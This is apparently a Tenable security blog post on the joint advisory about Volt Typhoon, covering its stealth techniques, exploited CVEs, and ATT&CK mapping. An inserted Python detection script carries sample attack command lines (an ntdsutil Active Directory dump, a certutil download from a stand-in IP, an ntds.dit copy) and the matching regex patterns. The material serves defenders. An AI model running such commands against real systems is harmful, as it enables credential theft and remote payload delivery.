Volt Typhoon: International Cyber Security Authorities Detail Activity Linked to Chinese State-Sponsored Threat Actor (2023)


Several international cybersecurity authorities from the US, UK, Australia, Canada and New Zealand are issuing a joint advisory detailing tactics, techniques and procedures used in recent attacks by a Chinese state-sponsored threat actor.

Background

On May 24, several international agencies - including the Cybersecurity and Infrastructure Security Agency (CISA), the Federal Bureau of Investigation (FBI) and the National Security Agency (NSA) of the United States, the Australian Cyber Security Centre (ACSC), the Communications Security Establishment's Canadian Centre for Cyber Security (CCCS), the New Zealand National Cyber Security Centre (NCSC-NZ) and the UK National Cyber Security Centre (NCSC-UK) - issued a joint cyber security advisory (CSA), AA23-144a, on Volt Typhoon, a state-sponsored threat actor from the People's Republic of China (PRC). In addition to the joint CSA, Microsoft's Threat Intelligence Team published a separate blog post which also highlights activity associated with Volt Typhoon.

Analysis

The following are some of the key points described in the joint cybersecurity advisory:

Where does the name "Volt Typhoon" come from?

It is part of a new naming convention used by Microsoft.

How long has Volt Typhoon been in operation?

Reports suggest the group has been active since "at least 2021."

What are some of the geographic regions and industries that Volt Typhoon is targeting?

In both the joint CSA and Microsoft's blog post, Volt Typhoon has been observed targeting critical infrastructure organizations in the United States as well as the US island territory of Guam.

What is notable about Volt Typhoon's activity?

The threat actor has a strong focus on "stealth" activity, using what is known as living-off-the-land (LOTL) techniques and hands-on-keyboard activity.

LOTL techniques include the use of legitimate network tools preloaded on operating systems to mask their activities, such as certutil, ntdsutil, xcopy and more. Hands-on-keyboard activity, as the name suggests, involves a human attacker manually executing commands on a compromised system instead of relying on automated or scripted tooling. Threat actors use these techniques to avoid detection by common security solutions such as endpoint detection and response (EDR).

Volt Typhoon is known to focus primarily on espionage and information gathering, and the group's recent activity has centered around critical infrastructure, prompting the joint CSA to alert defenders to the threat actor's activity as well as their tactics, techniques and procedures.

Does Volt Typhoon use other techniques to hide their activity?

Yes, the CSA notes the group's use of compromised small-office/home-office (SOHO) devices to obfuscate its activity, including a variety of devices from different vendors:

  • ASUS
  • Cisco RV
  • Draytek Vigor
  • FatPipe IPVPN/MPVPN/WARP
  • Fortinet Fortigate
  • Netgear Prosafe
  • Zyxel USG

The group uses these compromised SOHO devices to proxy network traffic in an attempt to appear as legitimate network activity. Although no information was provided on how these devices were compromised, we strongly recommend ensuring that all SOHO devices are kept up to date with the latest security patches.

In addition, if these devices have been configured to publicly expose their management interfaces, you should follow the vendors' recommendations on how to secure these configurations or disable remote access to these devices where possible.

How does Volt Typhoon gain initial access to targeted organizations?

Leveraging Internet-facing assets such as Fortinet Fortiguard appliances, ManageEngine ADSelfService Plus, and FatPipe's WARP, IPVPN, and MPVPN products.

Does Volt Typhoon exploit any known vulnerabilities?

Yes, the joint CSA highlights two vulnerabilities in ManageEngine and FatPipe products that have been linked to Volt Typhoon. The agencies note that the vulnerabilities exploited by the threat actor include, but are not limited to, the following:

| CVE | Description | CVSSv3 | VPR* |
|---|---|---|---|
| CVE-2021-40539 | ManageEngine ADSelfService Plus Authentication Bypass Vulnerability | 9.8 | 9.2 |
| CVE-2021-27860 | FatPipe WARP, IPVPN, MPVPN Unrestricted Upload of File with Dangerous Type | 8.8 | 7.4 |

*Please note: Tenable's Vulnerability Priority Rating (VPR) scores are calculated each night. This blog post was published on May 25 and reflects the VPR at that time.

Are there other vulnerabilities used by Volt Typhoon?

While Microsoft's blog post notes that Volt Typhoon targets Fortinet Fortiguard devices, no specific CVEs were mentioned. However, we know that Fortinet devices are a popular target for APT groups, including APT5, and there has recently been activity linking Chinese threat actors to several Fortinet flaws, such as CVE-2022-42475 and CVE-2022-41328. However, we cannot definitively link these vulnerabilities to Volt Typhoon activity.

Historically, state-sponsored threat actors in China have exploited known vulnerabilities for years at a time, as shown in similar, older advisories identified as U/OO/179811-20 from 2020 and AA22-279A from 2022. For example, CVE-2021-40539, mentioned earlier, appears in AA22-279A. In addition, a flash alert issued by the FBI in November 2021, AC-000155-MW, discussed a zero-day vulnerability in FatPipe that was eventually assigned CVE-2021-27860. In the flash alert, the FBI describes its use by an APT actor dating back to "at least May 2021," along with the implantation of webshells on vulnerable devices.

As we outlined in our 2022 Threat Landscape Report, known and exploitable vulnerabilities continue to be favored by a number of threat actors. Identifying and remediating vulnerabilities with readily available proof-of-concept (PoC) code should remain a top priority for any organization seeking to reduce its exposure.

Does Volt Typhoon use malware?

According to Microsoft's blog post, the group rarely uses malware, but appears to prefer to rely on LOTL methods through the use of legitimate tools in an attempt to steal credentials as part of post-compromise activity.

Is Volt Typhoon targeting Active Directory?

Yes, the threat actor attempts to extract credentials from Active Directory (AD), as well as make a copy of the ntds.dit database. With a copy of ntds.dit, the threat actor can exfiltrate the database and use password cracking tools to compromise additional user accounts while remaining stealthy.
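The LOTL tooling described above (certutil, ntdsutil, xcopy) and the ntds.dit copying described here leave process-creation telemetry that a defender can match on. The following is an added example, not code from the advisory or from Tenable: a small rule engine that runs over constructed process-creation events (a simplified image/command line/user shape) and flags the tool patterns, then surfaces users who chained more than one LOTL tool, since a sequence of such commands from one account is a stronger hands-on-keyboard signal than any single hit. The sample events, rule names and the specific command-line patterns are assumptions chosen for illustration; the technique IDs come from the ATT&CK mapping on this page where one applies.

```python
"""Detection sketch for living-off-the-land (LOTL) command lines.

Added example (not code from the advisory or from Tenable). The command-line
patterns are typical shapes assumed for illustration, not copied from telemetry.
"""
import re
from collections import defaultdict

# Constructed sample events in a simplified Windows process-creation shape.
# These are not real telemetry; the hosts, users and paths are made up.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\ntdsutil.exe",
     "cmdline": r'ntdsutil.exe "ac i ntds" ifm "create full C:\Windows\Temp\ifm" q q',
     "user": "CORP\\svc-backup"},
    {"image": r"C:\Windows\System32\certutil.exe",
     "cmdline": r"certutil.exe -urlcache -split -f http://198.51.100.7/a.txt C:\Users\Public\a.txt",
     "user": "CORP\\jdoe"},
    {"image": r"C:\Windows\System32\xcopy.exe",
     "cmdline": r"xcopy.exe C:\Windows\NTDS\ntds.dit C:\Users\Public\ntds.dit /H /Y",
     "user": "CORP\\jdoe"},
    {"image": r"C:\Windows\System32\certutil.exe",      # benign certutil use
     "cmdline": r"certutil.exe -verify C:\certs\server.cer",
     "user": "CORP\\admin"},
    {"image": r"C:\Windows\System32\xcopy.exe",         # benign xcopy use
     "cmdline": r"xcopy.exe \\fileserver\share\reports C:\Reports /E",
     "user": "CORP\\jdoe"},
]

# Each rule: a name (assumed), the ATT&CK technique from the page's table where
# one applies (otherwise a plain description), an image-name regex and a
# command-line regex. Both regexes must match for the rule to fire.
RULES = [
    {"name": "ntdsutil_ifm_dump",            # ntdsutil "install from media" dump of AD
     "technique": "T1003.003",
     "image": r"\\ntdsutil\.exe$",
     "cmdline": r"\bifm\b.*\bcreate\b"},
    {"name": "ntds_dit_copy",                # copying the AD database file
     "technique": "T1003.003",
     "image": r"\\(xcopy|robocopy)\.exe$",
     "cmdline": r"ntds\.dit"},
    {"name": "certutil_download_or_decode",  # certutil used as a downloader/decoder
     "technique": "certutil abused for file download or decoding",
     "image": r"\\certutil\.exe$",
     "cmdline": r"-(urlcache|decode|encode)\b"},
]


def match_rule(rule, event):
    """True when both the image name and the command line match the rule."""
    return (re.search(rule["image"], event["image"], re.I) is not None
            and re.search(rule["cmdline"], event["cmdline"], re.I) is not None)


def detect(events):
    """Return one finding per (event, rule) pair that matches, in event order."""
    findings = []
    for ev in events:
        for rule in RULES:
            if match_rule(rule, ev):
                findings.append({"rule": rule["name"], "technique": rule["technique"],
                                 "user": ev["user"], "cmdline": ev["cmdline"]})
    return findings


def users_with_multiple_lotl_tools(findings, threshold=2):
    """Users who triggered at least `threshold` distinct rules.

    A chain of different LOTL tools from one account is a stronger
    hands-on-keyboard signal than a single command, which may be benign admin work.
    """
    by_user = defaultdict(set)
    for f in findings:
        by_user[f["user"]].add(f["rule"])
    return sorted(u for u, rules in by_user.items() if len(rules) >= threshold)


if __name__ == "__main__":
    hits = detect(SAMPLE_EVENTS)
    for f in hits:
        print(f"[{f['technique']}] {f['rule']}: {f['user']} :: {f['cmdline']}")
    print("users chaining LOTL tools:", users_with_multiple_lotl_tools(hits))
```

Run against the constructed events, the benign certutil -verify and the report xcopy produce no findings, the ntdsutil dump, the certutil download and the ntds.dit copy each produce one, and only the account that ran two distinct tools is surfaced by the chaining check. In production the same rules would be fed from Sysmon event 1 or Security event 4688 with command-line auditing enabled, and the threshold tuned against known backup and administration jobs.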

Proof of concept

Of the two vulnerabilities listed in the CSA, publicly available PoC exploit code only exists for CVE-2021-40539.

Identification of affected systems

A list of Tenable plugins to identify the two vulnerabilities highlighted in the CSA can be found here. This link uses a search filter to ensure that all matching plugin coverage is displayed as it is released. We also recommend scanning for and remediating these top 20 CVEs known to be exploited by threat actors associated with China.


The following is a list of MITRE ATT&CK techniques associated with Volt Typhoon that are mapped to Tenable Identity Exposure Indicators of Attack (IoA) as well as the associated attack path analysis techniques:

| Technique ID | Description | Indicators of Attack | Attack Path Technique |
|---|---|---|---|
| T1003.001 | OS Credential Dumping: LSASS Memory | I-ProcessInjectionLsass | T1003.001_Windows |
| T1003.003 | OS Credential Dumping | I-NtdsExtraction | T1003.003_Windows |
| T1047 | Windows Management Instrumentation | N/A | T1047_Windows |
| T1059.001 | Command and Scripting Interpreter: PowerShell (Windows) | N/A | T1059.001_Windows |
| T1069.001 | Permission Groups Discovery: Local Groups | I-ReconAdminsEnum | T1069.001_Windows |
| T1069.002 | Permission Groups Discovery: Domain Groups | N/A | T1069.002_Windows |
| T1110.003 | Brute Force: Password Spraying (Windows) | I-PasswordSpraying | T1110.003_Windows |

As both Microsoft and the joint CSA point out, Volt Typhoon has been known to target and exploit Internet-facing assets for the initial compromise of networks. The external attack surface represents one of the biggest risk factors for organizations today. To minimize the risk of a breach, it is important that organizations fully understand their external attack surface and the opportunities for exploitation it presents. Tenable Attack Surface Management (formerly Tenable.asm) provides comprehensive visibility into all your Internet-connected assets, helping you better assess and manage external risk.

Additionally, the joint CSA strongly recommends following best practices for identifying and addressing AD vulnerabilities and misconfigurations. To assist in these efforts, Tenable Identity Exposure (formerly Tenable.ad) can be used to reduce your exposure and find and fix weaknesses before they become business-impacting issues.

Get more information

Connect with Tenable's Security Response Team on the Tenable Community.

Learn more about Tenable One, the Exposure Management platform for the modern attack surface.


Tenable Security Response Team

The Tenable Security Response Team (SRT) tracks threat and vulnerability intelligence feeds to ensure our research teams can deliver sensor coverage to our products as quickly as possible. The SRT also works to analyze and assess technical details and writes white papers, blogs and additional communications to ensure stakeholders are fully informed of the latest risks and threats. SRT provides breakdowns for the latest vulnerabilities on the Tenable blog.

Article information

Author: Rob Wisoky

Last Updated: 25/05/2023
